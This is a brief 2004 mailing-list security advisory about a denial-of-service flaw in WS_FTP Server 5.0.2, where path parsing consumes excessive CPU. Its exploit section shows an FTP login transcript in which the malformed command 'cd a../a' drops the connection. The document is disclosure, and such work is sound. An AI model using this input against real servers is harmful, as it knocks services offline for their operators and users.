[vulnwatch] WS_FTP Server Denial of Service Vulnerability www.cnhonker.com Security Advisory Advisory Name: WS_FTP Server Denial of Service Vulnerability Release Date: 08/30/2004 Affected version: WS_FTP Server 5.0.2 Author: lion <lion@xxxxxxxxxxxx> Overview: A vulnerability has been found in WS_FTP Server. The problem \ is in the module of file path parse will cause FTP server to \ consume large amounts of CPU power. Exploit: E:\>ftp localhost Connected to ibm. 220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167) 220-Fri Aug 27 14:12:19 2004 220-29 days remaining on evaluation. 220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167) User (ibm:(none)): ftp 331 Password required Password: 230 user logged in ftp> cd a../a Connection closed by remote host. About HUC: HUC is still alive.
